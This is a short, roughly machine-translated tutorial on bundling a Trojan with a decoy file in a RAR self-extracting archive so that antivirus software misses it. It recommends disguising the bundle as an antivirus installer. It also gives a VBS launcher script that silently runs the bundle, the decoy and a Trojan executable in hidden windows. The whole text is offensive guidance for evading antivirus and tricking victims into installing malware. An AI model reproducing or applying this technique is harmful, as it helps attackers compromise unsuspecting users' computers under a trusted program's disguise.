First of all, we must understand the principle. Bundling, almost all of the files are released after the first run, so the bundled files themselves must be free of killing. Otherwise, even if bundled together to avoid killing, when running, a release, immediately will be killed. Self-extracting method of production I won't say it, Hongyu. A point to note.
in the box selection of files must first select the Trojan, and then select the cover file, or the risk of a high rate of toxicity. Cover file, the best is antivirus software itself. If we make the self-extracting bundle file is 1.exe. If we set the file directly to run the bundle after decompression, it will be killed to a large extent. So we need to use a VBS to run Trojans and camouflage programs. Two self-extracting bundles of 1.exe and VBS files run the VBS file after the decompression is set during this production. VBS file is in the following code. On Error Resume Next Set objwsh = CreateObject ("Wscript.Shell") objwsh.run "C:\1.exe c \", 0,true Wscript.Sleep 3000 Objwsh.run "C:\360sd_se_3.1.0.3073L.exe c \", 0,true objwsh.run "C:\X7server.exe c \", 0,true code means very simple, After decompression will release 1.exe bundle files, and VBS files. After the VBS runs, run the 1.exe file. The 1.exe file will automatically release Trojan and camouflage files after it is run. VBS will delay 3 seconds before running the masquerading file and then running the Trojan. The use of VBS to execute running commands, after two times bundled to achieve the effect of the bundled operation of the kill-free. Translated from: http://www.zhizhuowz.com/post-539.html
RAR self-extracting format combined with VBS script-free Kill bundle
